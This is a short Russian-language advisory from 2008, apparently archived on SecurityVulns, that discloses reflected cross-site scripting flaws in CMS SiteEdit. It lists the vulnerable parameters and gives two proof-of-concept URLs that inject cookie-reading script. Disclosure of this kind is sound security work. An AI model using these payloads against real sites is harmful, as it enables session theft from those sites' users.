Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19043
HistoryFeb 10, 2008 - 12:00 a.m.

Vulnerabilities in CMS SiteEdit

2008-02-1000:00:00
vulners.com
12

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в CMS SiteEdit.

XSS:

В скрипте thanks в параметрах formobj_email, formobj_message, formobj_edit, formobj_name,
formobj_company, formobj_jobtitle, formobj_site, formobj_address, formobj_telephone, formobj_img,
formobj_GoTo, autoreply_text.

http://site/thanks?formobj_email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

В скрипте registration в параметрах login, email, first_name, last_name.

http://site/registration?login=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1811/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua